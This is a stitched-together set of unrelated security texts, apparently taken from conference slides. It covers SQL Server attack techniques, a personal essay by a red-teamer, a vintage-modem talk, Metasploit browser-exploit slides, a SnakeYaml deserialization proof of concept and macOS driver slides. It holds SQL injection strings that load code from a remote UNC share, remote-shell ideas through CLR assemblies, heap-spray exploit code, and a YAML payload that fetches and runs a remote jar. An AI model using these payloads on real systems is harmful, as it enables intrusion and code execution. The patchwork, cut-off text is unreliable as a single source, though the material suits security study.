  EXEC sp_OAGetProperty @o, 'status', @status OUT
  EXEC sp_OADestroy @o
  SELECT @s + CASE @rop
    WHEN -2147012891 THEN 'Blocked'
    WHEN 0 THEN
      CASE @rse
        WHEN -2147012744 THEN 'Open'
        WHEN 0 THEN 'Open/WWW'
        WHEN -2147012867 THEN 'Closed'
        WHEN -2147012894 THEN 'Filtered'
        WHEN -2147012851 THEN 'Open/WWWR'
        ELSE 'Invalid'
      END
    END
END
Basic probe stored procedure
Instantiate OLE control
Configure control timeouts
Initialise control (capture return code)
Send request (capture return code)
Grab HTTP status
Test return codes and determine port status
Create URI from ip and port
Putting it together
• Using the probeIP() building block, we
can build further tools
• Port sweepers
– scanports(ip, portlist)
• Portscanners
– scanhosts(iplist, port)
• Webserver detectors
So what does that give us?
• A SQL-based port scanner
• Implemented in a stored proc
• Can scan almost all ports
• Supports HTTP detection
• But why?
– No messy nmap uploads
– No A/V footprints
What’s going to trip us up?
•
Inter-protocol protections
– Cross-protocol attacks have been around for a while
– Been getting a bit of attention again
Sandro Gauci recently provided a short paper enumerating browser support
– Browsers provide protection by banning connections to specific
ports
– FF bans 58, Opera bans 58, Safari bans 43
– IE 7 bans 6 ports, IE 6 banned 5 ports, IE 5 didn’t ban at all
– More of a stumble than a trip, all the interesting ports are still
allowed
•
Proxies
– setProxy can disable proxy requests
•
Speed
– Stats?????
Squeezing OLE juice
• Turns out, sometimes we make the right
decision
• Integrating with Squeeza is simple
– Portscanner generates content
– Can pull results through dns, timing or http
errors
OLE dog, new tricks
• OLE objects deserve lots more looking at
• Why bother with debug scripts, when a
combination of T-SQL and
‘scripting.filesystemobject’ can write anything
to disk?
• Why bother with xp_cmdshell, when
‘scripting.shell’ works just as well regardless
of whether the stored proc is available
• Importantly, this functionality is available
across multiple SQL server versions, making
attacks version independent
SQL2005 – Pen Tester
Nightmare?
• By all accounts SQL 2005 is Microsoft’s SDLC
flagship product
• SQL Server poses some unique challenges:
– Highly Public;
– Highly Exploited;
– Not really directly through Microsoft’s fault!
• They had to take steps to reduce attack surface,
to stop people hurting themselves (think
mandatory seat-belts in cars)
• Much touted SD3 – Secure by Design, Secure by
Default, Secure by Deployment
• Famous hax0r celebrities have stated how they
hate coming up against SQL05 on deployed
applications
I call Shenanigans!
Fundamental problems with ‘05
• Microsoft needed desperately
to reduce the attack surface on
SQL05.
• 1000 stored procedures
available in a default (SQL7)
install?
5:1
• Much publicized lock-down of superfluous
functionality and features.
• This however has 2 major problems
The 2 Big Problems
• Mixed Messages: Incoherent at best and
Dishonest at worst.
• Any software engineer will tell you that
Features will win because of “dancing
pigs” and “management by in-flight
magazine”.
The 2 Big Problems
1. Mixed Messages: Incoherency, In Flight
Magazines and Dancing Pigs.
2. In-Band Signaling:
–
This mistake is so old, it almost hurts to
write it.
–
Cap’n Crunch vs. Telephone Systems
–
Buffer Overflows and Von Neumann
Architectures
•
SQL Server 2005 makes heavy use of in-
band signaling.
•
Secure by design?
InBand Signaling++
(sp_configure)
• Early Microsoft documentation on SQL Best
Practice mentioned disabling xp_cmdshell.
– Every one of the (many) SQL Injection tools out
there uses sp_configure to re-enable
xp_cmdshell.
– This is an old lesson for SQL Server to learn!
• In fact _all_ of the features widely screamed
to be locked down, can be re-enabled within
the same channel. (the same channel that
SQL Injection rides in on!)
• This shared channel for
configuration/administration obviously buys
us some convenience, but a secure design?
sp_configure; RECONFIGURE
• Ad Hoc Distributed Queries
– (used by many tools to brute-force sa
password)
– (used by many tools for effective data
extrusion – SQL DataThief)
• xp_cmdshell
– Almost as famous as ‘ or 1=1--
• CLR Integration
– The gateway to much fun..
• In-band signals FTW!
SQL2005 – Some new features
• Other than old favorites, we are going to
look at 2 new ones:
– Native XML Web Services;
– CLR Integration.
Native XML Integration
• The marketing pitch:
“Microsoft SQL Server 2005 provides a standard mechanism for
accessing the database engine using SOAP via HTTP. Using this
mechanism, you can send SOAP/HTTP requests to SQL Server”…”
Since the SOAP/HTTP access mechanism is based on well-known
technologies such as XML and HTTP, it inherently promotes
interoperability and access to SQL Server in a heterogeneous
environment. Any device that can parse XML and submit HTTP
requests can now access SQL Server.”
• Native Soap Integration and the wiley
hacker
– Web Server DoS?
– Comfortable X-Platform Query Manager?
Web-Server DoS
• Denial of Service is boring!
• But boring will hurt you just as badly as
anything else..
Web-Server DoS
• SQLServer now interacts directly with http.sys in the
Win2k3 kernel to manage created endpoints.
• When included within a standard ‘CREATE
ENDPOINT’ call, MSDN is quite specific: “while the
SQL Server-based application is running, any HTTP
requests to this endpoint are forwarded to the
instance of SQL Server. ”
1.
2.
3.
But surely this needs privs?
• This _had_ to come up with threat modeling.
– Secure marketing docs mention: “Both the Windows
account and the SQL Server account that SQL
Server 2005 impersonates must have local Windows
administrator privileges for the HTTP endpoint
registration to succeed.”
• Bah! Sounds like we are out of luck..
– MSDN (again): “If you execute the statement in the
context of a SQL Server account, for example, sa or
some other SQL Server login, SQL Server 2005
impersonates the caller by using the SQL Service
account, specified when SQL Server is installed, to
register the endpoint with HTTP.SYS.”
• Ah.. So all we need is to be SA / in sysadmin (will
that ever happen??
SA == DoS on every IIS
Instance ?
• IIS Server running multiple sites (using
name based or IP based virtual hosting)
• SQL Service account given FileSystem
restrictions to ensure that SQL DBA cant
deface / affect other customer sites.
• Sounds like “NT Port bind, 10 years later..”
Creating endpoints for fun and
profit
'exec('CREATE FUNCTION getServerVersion()
RETURNS NVARCHAR(MAX) AS BEGIN;RETURN
(@@VERSION);END')--
' exec('CREATE ENDPOINT eepp STATE = STARTED AS HTTP
(AUTHENTICATION = ( INTEGRATED ),PATH = ''/sql/demoo'',PORTS = ( CLEAR
))FOR SOAP (WEBMETHOD ''getServerVersion''(NAME =
''demo_db.dbo.getServerVersion''),BATCHES = ENABLED,WSDL = DEFAULT)')--
1.
2.
3.
• The vector here is obvious: We wanted to
build a function or proc. That would accept
arbitrary input from SOAP, then eval() it…
• But Microsoft beat us to it…
X-Platform Query Managers
•
Did you notice the methods VisualStudio extracted from the
WSDL ?
•
MSDN: “When BATCHES are ENABLED on an endpoint by
using the T-SQL command, another SOAP method, called
"sqlbatch," is implicitly exposed on the endpoint. The sqlbatch
method allows you to execute T-SQL statements via SOAP”
getServerVersion()
Sqlbatch(BatchCommands As string, Parameters As ArrayofParameters)
' exec('CREATE ENDPOINT ep2 STATE=STARTED AS HTTP
(AUTHENTICATION=(INTEGRATED),PATH =
''/sp'',PORTS=(CLEAR))FOR SOAP(BATCHES=ENABLED)')--
1.
2.
3.
New: CLR Integration
•
The thing that made squeeza difficult to write in ‘07 was
mainly T-SQL.
•
T-SQL is Turing Complete but when trying to extract data
from a network via encoded DNS packets or timing it starts to
creak a little.. (we did it, but lost a lot of hair in the process)
•
Microsoft to the rescue (msdn): “Microsoft SQL Server 2005
significantly enhances the database programming model by
hosting the Microsoft .NET Framework 2.0 Common
Language Runtime (CLR). This enables developers to write
procedures, triggers, and functions in any of the CLR
languages, particularly Microsoft Visual C# .NET, Microsoft
Visual Basic .NET, and Microsoft Visual C++. This also
allows developers to extend the database with new types and
aggregates.”
•
Huh ?
•
Turned off by default…
– Remember slide on in-band signals &&sp_configure ?
– exec sp_configure(clr enabled),1
New: CLR Integration
• Does allow for very fine grained access
control.
• Fortunately these can all be over-ridden if
you have SA access.
• Simply it allows us to load an arbitrary
.net Assembly into SQL Server, and
depending on how we handle it, possibly
execute this binary within SQL Servers
address space.
• How do you load a .net assembly?
Loading .net Assemblies (csc)
• Create .cs file on filesystem (1)
• Call on csc.exe to compile the binary (2)
• Import the binary into SQL (3)
• Profit! (4)
(1)
(2)
(3)
(4)
Loading .net Assemblies (csc)
• There has been talk of ntsd and
debug.exe being removed in default
installs.
• Fortunately, we now have csc.exe
shipping with every deployed SQL Server!
• csc.exe is perfectly predictable:
– %windir%\system32\dllcache\csc.exe
• This is still pretty ghetto!
Loading .net Assemblies (UNC)
• Fortunately, like DLL’s this can be loaded
from a UNC share too.
• Profit!
• (Of course all of this is do-able via an
injection point)
• http://victim2k3.sp.com/login.asp?
username=boo&password=boo'%20CREATE%20ASS
EMBLY%20moo%20FROM%20'\\196.31.150.117\tem
p_smb\moo.dll'—
• But this still requires outbound \\UNC (which
is still useful for squeeza and DNS
resolution), but remains ghetto!
Loading .net Assemblies
(0x1618..)
• T-SQL Syntax allows the assembly to be
created at runtime from the files raw hex.
1.File.open("moo.dll”,"rb").read().unpack("H*
")
["4d5a90000300000004000000ffff0......]
2.CREATE ASSEMBLY moo FROM
0x4d5a90000300....
3.exec HelloWorldSP (Profit!)
• This makes creation via injection even easier!
Assemblies and Security Privs.
• Your created binary is by default placed
inside a sand-box
• Assemblies are loaded as:
– SAFE [Calculations, No external Resources]
– EXTERNAL_ACCESS [Access to Disk,
Environement, Almost everything with some
restrictions]
– UNSAFE [God Help You! | Equivalent of Full
Trust | Call unmanaged Code / Do Anything as
SYSTEM]
• UnSafe Assemblies must be signed with a
new CLR Signing procedure or
• SA can set the Database to “Trustworthy”
What can we do with this?
• The fun is just beginning:
– Effectively loading binaries into memory
without noticeably affecting disk in an
unusual manner!
– .net assembly to launch calc.exe (as System)
– .net assembly to launch remote shell (System)
– Squeeza without the horrible T-SQL ?
– reDuh.clr. sql
[1] SQL Injection used to create CLR reDuh.exe on SQL Server
[2] Local Proxy breaks down TCP packets, submits to reDuh through SQL
Injection strings..
[3] reDuh.clr extracts packet info and
submits packets to destination
[4] Return packets are encoded by reDuh within SQL Server, and fetched by the attacker's proxy using the injection vector, completing the circuit.
Questions ?
References
“Advanced SQL Injection In SQL Server Applications”, Chris Anley,
2002
“Building the bridge between the web app and the OS: GUI access
through SQL Injection”, Alberto Revelli, 2008
“IServerXMLHTTPRequest/ServerXMLHTTP”
http://msdn.microsoft.com/en-
us/library/ms762278%28VS.85%29.aspx
“The Extended HTML Form attack revisited”, Sandro Gauci, 2008
“Programming Microsoft® SQL Server™ 2005”, Andrew J. Brust,
2006
“Writing Stored Procedures for Microsoft SQL Server”, Mathew
Shepker, 2000
“Overview of Native XML Web Services for Microsoft SQL Server
2005”, http://msdn.microsoft.com/en-us/library/ms345123.aspx,
2005 | pdf |
I was lucky to be invited by my mentor Jitou to take part in "Jiyou Story Time" and share a few informal notes. Let's just call this piece "A Quarter of a Life", my quarter.

It has actually been many years since I first came into contact with security. When I was a kid, our home computer caught the Panda Burning Incense virus. My dad spent ages trying every trick to fix it, and from that moment a seed was planted in my heart. Later I paid a "master" to take me on and got scammed buying tools; I went through all of that. It was an era when point-and-click tools like Ah-D and Ming Xiaozi could flatten whole swathes of websites, yet I never settled down to study the underlying principles properly, which I now find rather regrettable. Because of school I put it aside for a long time, until it came time to choose a university major, and it turned out the seed had sprouted long ago. Against my family's wishes, on the last day I secretly changed the order of my application choices, gave up the path my family had arranged, and stepped onto the bridge of the web. I suppose that was my way of holding on. Chatting later with the friends around me, I found that many people entered the security circle carrying that same original aspiration. Some were later forced into other jobs or are still busy making a living, but in their hearts they will always remember the persistence of those days and the stories they wrote.

I remember last year, for various reasons, I quit my job with nothing lined up and stayed home for several months, and then, for other reasons, began looking for a red-team position. I interviewed at a handful of chosen companies and ran into plenty of tempting offers and traps. Some interviews I passed and some I failed; some fits were right and some were not. I was lost, I hesitated, I thought about giving up. In the end I decided to stay true to myself and do what I wanted to do. At that time I drew up a three-year career plan for myself, and I am still working at it every day. During that low point I wrote myself an essay called "How much longer do you plan to hide behind the word 'young'?", and there is a passage in it, written to myself, that I would like to pass on to everyone.

Slowly I adapted to my current life. When there is an engagement I work the engagement, running into scenario after scenario, problems to solve, things to optimize, tactics and techniques; when things quiet down I let all of it settle, read articles, study the new ideas of the masters, and try to enrich myself. I have attacked finance and energy, ministries and state enterprises, internet healthcare, and many industries I did and did not know. Sometimes I catch myself staring into space, thinking that when we go home we have no idea how to explain to the neighbors what we do. If I say I work in network security, they ask, "Doing what?" I say internet IT, security stuff. They say, "Oh, an IT elite," while probably thinking that next time the family computer breaks they should ask me to fix it, that sort of thing.

Later, during the 2020 Spring Festival, I did not go home because of the pandemic, and I had the good fortune to take part in the critical protection effort for a certain project. Ever since then I have loved a line I made up myself: "You take care of keeping the real world bright and sunny; we move quietly forward in the world you cannot see." It made me feel that we too had become people of consequence, blocking great harm in a field they do not understand and guarding many people. I remember the day of that operation clearly: February 11, 2021, my first day as a confirmed full-time employee at my new company, and my first New Year spent away from home.

That day I wrote myself a short passage, and I quietly photographed some beautiful fireworks to share with everyone.

I am glad I took this road and kept at the technical work until now instead of switching to another role. Thanks to my mentor for the invitation to share, and thanks to the many, many friends I have met in this circle who strive alongside me, eating together, earning a living, grinding away at technique. Sorry that this time I did not share any technical growth or technical articles; I will make it up next time for sure. Oh, right: this is my quarter of a life, a story about me, told to all of you.
Old-Skool Brought Back
A 1964 Modem Demo
K.C. Budd "phreakmonkey"
Taylor Banks "dr. kaos"
Modems, explained
Modulator / Demodulator
Modulator: Encodes a digital signal over an analog
representation
Demodulator: Reconstructs the digital signal from the
analog representation
Digital signal rate = bits per second (bps)
Analog "symbol" rate = baud
In many cases, bps != baud
Timeline of Modem History
~1959 "Bell 101" 110 baud standard, Anderson-Jacobson modems introduced for
private-line use by US Military
1962 "Bell 103" 300 baud standard, AT&T commercial modems introduced
~1963 Livermore Data Systems Model A
1968 "The Carterphone Decision" - allowing third party devices
to be electrically connected to telephone lines*
1972 Vadic 1200bps modem
1976 AT&T Bell 212A 1200bps standard
1981 Hayes 300bps
"Smartmodem"
Hayes AT-Command Set
1958
1968
1978
1988
Ladies and Gentlemen:
A circa 1964
Livermore Data Systems
Model A Modem
Serial # 0279
So, wait. 1964?
Isn't that older than you are?
Comment on gizmodo.com :
By: 92BuickLeSabre 10:12 PM on Thu May 28 2009
That was surprisingly bad-ass.
(Especially the part at the beginning where he ripped off the poor
grieving little old lady.)
Model A: Physical Characteristics
Hand Crafted Wood Box
Dovetail Joints
Brass Hardware
Notch-cutout for Phone Handset Cord
Labels
Model A: Technical Characteristics
Modulation: Bell 103
300 baud / 300 bps
Originate Mode Only
Frequency Shift Keying
No error correction
Directly Modulates RS232 TX line
No internal clock
No handshaking / synchronization
Requires +/- 12V RS232 levels
5V TTL levels will not work
Bell 103 Modulation FSK:
RS232 TX Line:
Carrier:
Modulated
Signal:
Originate Mode:
Mark = 1270 Hz
Space = 1070 Hz
Answer Mode:
Mark = 2225 Hz
Space = 2025 Hz
mark
space
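A minimal sketch of an originate-mode Bell 103 modulator follows. The sample rate and bit framing are chosen for convenience of illustration; the real Model A modulates the RS232 TX line directly with these two tones.

```python
import math

RATE = 48000                 # samples per second (chosen for this sketch)
BAUD = 300                   # Bell 103: 300 baud == 300 bps
MARK, SPACE = 1270, 1070     # originate-mode tone frequencies in Hz

def fsk_modulate(bits):
    """Emit one sine burst per bit: MARK (1270 Hz) for a 1,
    SPACE (1070 Hz) for a 0, each lasting 1/300 s."""
    samples_per_bit = RATE // BAUD   # 160 samples per bit
    out = []
    for bit in bits:
        freq = MARK if bit else SPACE
        for _ in range(samples_per_bit):
            t = len(out) / RATE      # running sample clock
            out.append(math.sin(2 * math.pi * freq * t))
    return out

# 8 data bits of one asynchronous character
wave = fsk_modulate([0, 1, 1, 0, 1, 0, 0, 0])
assert len(wave) == 8 * (RATE // BAUD)
```

An answer-mode modulator would be identical with MARK/SPACE swapped to 2225/2025 Hz.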
What Use is 300 baud?
Terminal Sessions
Troubleshooting
Data Entry
Data Transfers
Program Submission
Text files
Reporting
Business reports (ledgers, inventory, &etc)
Status Monitoring
Remote Sensing
One Personal Account
From: winnall@[deleted]
To: [email protected]
Subject: Modem
Hi,
I stumbled on your youtube video. It brought back some interesting memories.
We used that model in about 64 as you surmised. The big problem was dirty
lines. If you got a line that had any noise on it, the modem used to return all
sorts of Junk. As we used it to transfer data for computation between
computers, we often did not know the dirty line existed until results started to
come out all gobbledygook. The worst case was when we some how got an infinity
loop happening in the mainframe and all terminals froze. Took some time to
diagnose and rectify!!! :-[
Bob in Oz
Other pre-1970 Modems
Livermore Data Systems Model B circa 1965
University of California, Davis
Other pre-1970 Modems
Livermore Data Systems Model C circa 1968
Stanford Computer History Museum
Other pre-1970 Modems
Livermore Data Systems Model B
Emailed by Rob / "gambit32"
Other pre-1970 Modems
Livermore Data Systems Model AH (Interim A/B?)
Emailed by Shaun from SFU.CA
Cool Acoustic Coupler Hack
Emailed by "toresbe" from Norway
DEMO TIME
or "Shut the hell up
and show us the modem!"
Demonstrating the Model A Modem
Demo 1: Connecting the modem, modulation, and noise
Demo 2: Dialing into a system at 300 baud
Demo 3: Replaying a previously recorded Bell 103 session
into the modem.
Demo 4: (Hopefully!) Making the modem talk / listen
through unusual mediums
- Cellular phone - Walkie Talkies
- PVC Pipe - Room P.A. system?
- Other?
Thanks for coming!
Thanks to:
DEFCON Organizers, Volunteers, and Goons
DC404 (dc404.org)
Livermore Data Systems
Everyone who emailed or commented
The old lady who gave me the modem
All of you for coming to my talk.
Using Guided Missiles in Drivebys
Automatic browser
fingerprinting and
exploitation with the
Metasploit Framework:
Browser Autopwn
James Lee
Browser Autopwn
● Auxiliary module for the Metasploit Framework
● Fingerprints a client
● Determines what exploits might work
● Used to suck
● Now it doesn't
Outline
● Intro
● Cluster bombs
● Guided missiles
● Fingerprinting and targeting
● Stealth
● Demos
● Commercial comparison
# whoami
● James Lee
● egypt
● Co-Founder, Teardrop Security
● Developer, Metasploit Project
My Involvement in MSF
● Started submitting patches and bug reports in
2007
● HD gave me commit access in April 2008
● Broke the repo April 2008
The Metasploit Framework
● Created by HD Moore in 2003
● ncurses based game
● Later became a real exploit framework in perl
● Rewritten in ruby in 2005
● Which is way better than python
● Extensible framework for writing exploits
I <3 MSF
● Modular payloads and encoders
● Many protocols already implemented
● Many non-exploit tools
● All kinds of exploits
● Traditional server-side
● Client-sides
Why Client-sides
● Karmetasploit
● Any other tool that gets you in the middle
● Users are weakest link, blah, blah, blah
● See Chris Gates
Client Exploits in MSF
● Extensive HTTP support
● Heapspray in two lines of code
● Sotirov's .NET DLL, heap feng shui
● Wide range of protocol-level IDS evasion
● Simple exploit in ~10 lines of code
Simple Exploit
content = "<html><body>
<object id='obj' classid='...'></object><script>
#{js_heap_spray}
sprayHeap(#{payload.encoded}, #{target.ret}, 0x4000);
obj.VulnMethod(#{[target.ret].pack('V')*1000});
</script></body></html>"
send_response(client, content)
Or Arbitrarily Complex
● ani_loadimage_chunksize is 581 lines of code
● As of June 28, MSF has 85 browser exploit
modules
Problem
Solution
Cluster Bomb Approach
● Is it IE? Send all the IE sploits
● Is it FF? Send all the FF sploits
● Originally exploits were ad-hoc
● Pain in the ass when new sploits come out
Problem
Solution
Guided Missile Approach
● Better client and OS fingerprinting
● less likely to crash or hang the browser
● Only send exploits likely to succeed
● Browser is IE7? Don't send IE6 sploits, etc.
Fingerprinting the Client
● User Agent
● Easy to spoof
● Easy to change in a
proxy
● A tiny bit harder to
change in JS
Fingerprinting the Client
● Various JS objects only exist in one browser
● window.opera, Array.every
● Some only exist in certain versions
● window.createPopup, Array.every, window.Iterator
● Rendering differences and parser bugs
● IE's conditional comments
Internet Explorer
● Parser bugs, conditional comments
● Reliable, but not precise
● ScriptEngine*Version()
● Almost unique across all combinations of client and
OS
● Brought to my attention by Jerome Athias
Opera
● window.opera.version()
● Includes minor version, e.g. “9.61”
Hybrid Approach for FF
● Existence of
document.getElementsByClassName
means Firefox 3.0
● If User Agent says IE6, go with FF 3.0
● If UA says FF 3.0.8, it's probably not lying, so
use the more specific value
Safari
● Still in progress
● Existence of window.console
● If Firebug is installed on FF, shows up there, too
● Availability of window.onmousewheel
● Defaults to null, so have to check typeof
Fingerprinting the OS
● User Agent
● Could use something like p0f
● From the server side, that's about it
Internet Explorer
● Again, ScriptEngine*Version()
● Almost unique across all combinations of client
and OS, including service pack
Opera
● Each build has a unique opera.buildNumber()
● Gives platform, but nothing else
Firefox
● navigator.platform and friends are affected by
the User Agent string
● navigator.oscpu isn't
● “Linux i686”
● “Windows NT 6.0”
Others
● Really all we're left with is the User Agent
● That's okay, most don't lie
● And those that do are likely to be patched anyway
● Generic, works everywhere when UA is not
spoofed
Future Fingerprinting
● QuickTime
● Adobe
● Less well-known third-party stuff
ActiveX
● “new ActiveXObject()” works if you have
the class name
● Otherwise, IE doesn't seem to have a generic
way to tell if an ActiveX object got created
● document.write(“<object ...>”)
● document.createElement(“object”)
Solution
● typeof(obj.method)
● 'undefined' if the object failed to initialize
● 'unknown' or possibly a real type if it worked
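The check above can be wrapped in a tiny helper. This is my own sketch, not code from the talk, and `VulnMethod` is a placeholder method name:

```javascript
// Classify whether an ActiveX-style object initialized, based on the
// typeof of one of its methods: 'undefined' means it failed to load;
// 'unknown' (old IE) or any real type means it is present.
function initialized(obj, method) {
  return typeof obj[method] !== "undefined";
}

console.log(initialized({}, "VulnMethod"));                  // false
console.log(initialized({ VulnMethod() {} }, "VulnMethod")); // true
```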
Target Acquired
What is it Vulnerable to?
● Coarse determination server-side
● JavaScript builds fingerprint, sends it back to the
server
● Server sends sploits that match the browser and
OS, possibly version
● Fine determination client-side
● navigator.javaEnabled exists, try
mozilla_navigatorjava
Select a Missile
● Sort by reliability
● Exploits contain
their own JS tests
Problem
Solution
Obfuscation
● Randomize identifiers
● Build strings from other things
● JSON / AJAX
● Obfuscation is not crypto
Encryption
● Put a key in the URL
● Not available in the standalone script
● Simple XOR is enough to beat AV and NIDS
● If they figure it out, it's easy to make the crypto
stronger
Demonstrations
And we're back...
● I hope that worked
● Now how do YOU make exploits work within
this framework?
Writing Exploits
● Add autopwn_info() to top of exploit class
● :ua_name is an array of browsers this exploit
will work against
● :vuln_test is some javascript to test for the
vulnerability (unless it's ActiveX)
● Usually comes directly from the exploit anyway
Example: mozilla_navigatorjava
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::FF,
:javascript => true,
:rank => NormalRanking,#reliable memory corruption
:vuln_test => %Q|
if (
window.navigator.javaEnabled &&
window.navigator.javaEnabled()
){
is_vuln = true;
}
|,
})
Example: ms06_067_keyframe
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => 'KeyFrame',
:classid => 'DirectAnimation.PathControl',
:rank => NormalRanking #reliable memory corruption
})
Example: winzip_fileview
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => 'CreateFolderFromName',
:classid => '{A09AE68FB14D43EDB713BA413F034904}',
:rank => NormalRanking #reliable memory corruption
})
Browser Autopwn Summary
● Reliable Target Acquisition
● Smart Missile Selection
● Stealthy from an AV perspective
● Easy to extend
● Detection results stored in a database
Commercial Comparison
● Mpack
● Firepack
● Neosploit
● Luckysploit
Mpack, Firepack
● Hard to acquire
● Old exploits
● Detection is only serverside
● Hard to change or update exploits
● Obfuscation + XOR
Neosploit
● Compiled ELFs run as CGI
● Unless you get the source or do some RE, you
won't really know what it does
Luckysploit
● Real crypto (RSA, RC4)
● Even harder to acquire
Browser Autopwn
● Easy to write new exploits or take out old ones
● Free (three-clause BSD license)
● Easy to get (http://metasploit.com)
● Not written in PHP
● OS and client detection is client-side, more reliable in the presence of a spoofed or borked UA
Future
● More flexible payload selection
● Stop when you get a shell
● Maybe impossible in presence of NAT/proxies
● Easier-to-use JS obfuscation
● UAProf for mobile devices
● Integration with MetaPhish
Download it
● svn co http://metasploit.com/svn/framework3/trunk
● Submit patches to [email protected]
Thanks
● hdm, valsmith,
tebo, mc, cg, Dean
de Beer, pragmatk
● Everybody who
helped with testing
● Whoever created
ActiveX
S-SnakeYaml Deserialization
SnakeYaml Basic Usage
Importing the Dependency
Serialization
The Myclass Class
Serialization Test
<dependency>
<groupId>org.yaml</groupId>
<artifactId>snakeyaml</artifactId>
<version>1.27</version>
</dependency>
package test;
public class Myclass {
String value;
public Myclass(String args){
value=args;
}
public String getValue(){
return value;
}
}
package test;
import org.junit.Test;
import org.yaml.snakeyaml.Yaml;
import java.util.HashMap;
public class tes {
@Test
public void test(){
Myclass obj = new Myclass("this is my data");
HashMap<String, Object> data = new HashMap<>();
data.put("Myclass",obj);
Yaml yaml = new Yaml();
String dump = yaml.dump(data);
System.out.println(dump);
}
}
Result
The leading !! forces a type conversion: the value is cast to the type named after the !!. This works much like Fastjson's @type — it specifies the fully qualified class name to use during deserialization.
Deserialization
The yaml File
Deserialization Test
Result
Deserialization Vulnerability
Reproducing the Vulnerability
POC
Myclass: !!test.Myclass {}
name:"zhangsan"
sex:man
age:20
id:1000001
package test;
import org.junit.Test;
import org.yaml.snakeyaml.Yaml;
import java.io.InputStream;
public class unserial {
@Test
public void test(){
Yaml yaml = new Yaml();
InputStream resourceAsStream =
this.getClass().getClassLoader().getResourceAsStream("test.yaml");
Object load = yaml.load(resourceAsStream);
System.out.println(load);
}
}
name:"zhangsan" sex:man age:20 id:1000001
Result
The above only performs a simple URL access; for deeper exploitation, see this project: yaml deserialization payload.
The SPI Mechanism
SPI, short for Service Provider Interface, is a service discovery mechanism. It looks for files in the META-INF/services folder on the ClassPath and automatically loads the classes defined in those files — in other words, it dynamically finds implementations for a given interface. To use the SPI mechanism, create a file named after the service interface in the META-INF/services/ directory on the Java classpath; the content of that file is the concrete implementation class of the interface.
How SPI works: the program uses java.util.ServiceLoader to dynamically load implementation modules, looks up the implementation class names in the configuration files under META-INF/services, loads them with Class.forName, creates objects reflectively with newInstance(), and stores them in a cache and a list.
import org.yaml.snakeyaml.Yaml;
public class demo {
public static void main(String[] args) {
String malicious="!!javax.script.ScriptEngineManager
[!!java.net.URLClassLoader [[!!java.net.URL [\"http://wopjpp.dnslog.cn\"]]]]";
Yaml yaml = new Yaml();
yaml.load(malicious);
}
}
Vulnerability Analysis
As mentioned earlier, SPI loads implementations dynamically through java.util.ServiceLoader. The exp code above implements ScriptEngineFactory and registers the implementation class name under META-INF/services/, and that class's static initializer holds our command-execution code. When the SPI mechanism loads the class via Class.forName and instantiates it with newInstance(), the static block runs, achieving command execution.
First, set a breakpoint at the code-execution site and inspect the call stack of the deserialization.
Following the stack above, we trace into org.yaml.snakeyaml.constructor.BaseConstructor#constructObjectNoCheck.
Here this.constructedObjects.containsKey(node) evaluates to False, so constructor.construct(node) will run; we therefore first need to examine Construct constructor = this.getConstructor(node).
Let's look at what the node parameter is: a deeply nested structure whose content is the serialized yaml string — every key is a node.
Then, since this.constructedObjects.containsKey(node) evaluates to False, execution enters constructor.construct(node).
Stepping in, we jump into the org.yaml.snakeyaml.constructor.Constructor#getConstructor method.
Next we step into the getClassForNode method.
At line 115 it first looks the tag up in the this.typeTags HashMap; if it is absent, the class name is obtained via node.getTag().getClassName(), which here is javax.script.ScriptEngineManager. This comes from our input, so look again at the payload being deserialized: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://192.168.87.1/yaml-payload/yaml-payload.jar\"]]]].
After obtaining the class name, it fetches the class object via getClassForName, and that class object is what gets returned.
The program returns, and we then enter the construct method.
Here, at line 160, node.getType().getDeclaredConstructors() retrieves all constructors, where node.getType() is the class object obtained in the previous step — the class object of javax.script.ScriptEngineManager.
After a series of computations, the object finally has to be created via the newInstance method.
In the payload above, every key is a class, so this object-creation step is invoked repeatedly, creating a different object each time; the payload fires when the javax.script.ScriptEngineManager object is created. To see exactly how creating javax.script.ScriptEngineManager triggers the code, we need to dig into how the SPI mechanism is implemented.
The SPI Mechanism
Set the breakpoint where the javax.script.ScriptEngineManager object is created.
Through a chain of reflective calls, we enter the constructor of javax.script.ScriptEngineManager.
Step into the init method.
Then step into the initEngines method: at line 123, the payload is triggered while the iterator is being consumed — specifically when it fetches the second element.
First, hasNext is called to check whether another element exists. During hasNext, a hasNextService method looks up the configuration in META-INF/services/javax.script.ScriptEngineFactory and returns True if it exists.
The value is then fetched via the next method. Let's trace deeper into next.
Here, at line 370, the remote jar is loaded via URLClassLoader.
Finally, at line 380, the object is created via reflection, triggering the payload.
)
((
( (((
)()()
Alibaba Security
• Xiaolong Bai
• Alibaba Security Engineer
• Ph.D. graduated from Tsinghua University
• Published papers on the top 4: S&P, Usenix Security, CCS, NDSS
• Twitter, Weibo, Github: bxl1989
• Min (Spark) Zheng
• Alibaba Security Expert
• Ph.D. graduated from The CUHK
• Twitter@SparkZheng Weibo@spark
Self Introduction
Agenda
• Overview
• Drivers in Kernel
• Userland Perspective
• New Vulns in Drivers on macOS
• Two new vulnerabilities
• New exploitation strategies
• Privilege escalation on the latest macOS
• Obstacles when analyzing Apple drivers
• Ryuk: a new tool to analyze Apple drivers
• Design
• Effects
• Implementation
• Benefits
Overview
• Every driver is a kernel extension (.kext) sharing the same space
with the kernel
• System daemon kextd is responsible for loading and unloading
drivers
• Location of driver binaries:
• On macOS: /System/Library/Extensions
• On iOS: integrated with kernel in kernelcache
Drivers in Kernel
• Programmed in C or C++
• Info.plist: configuration file in drivers for their property and usage
Kernel libs used in the driver
Class name to provide service to userspace
Class name of the driver
Drivers in Kernel
• Kernel APIs (KPI): APIs can be used by drivers to live in kernel
• /System/Library/Frameworks/Kernel.framework/Resources/SupportedKPI
s-all-archs.txt (on macOS)
• Basic KPI Modules:
• com.apple.kpi.iokit: For programming drivers, Apple provides an open-
source framework called iokit, which includes basic driver classes
• com.apple.kpi.libkern: a restricted c++ runtime lib in the kernel
• excluded features—exceptions, multiple inheritance, templates
• an enhanced runtime typing system: every class has an OSMetaClass object which
describes the class’s name, size, parent class, etc.
Drivers in Kernel
• A sample driver
Header File
Code File
Drivers in Kernel
• A sample driver
Header File
Code File
Parent of all drivers
Declare Con/Destructors
Callback methods of IOService
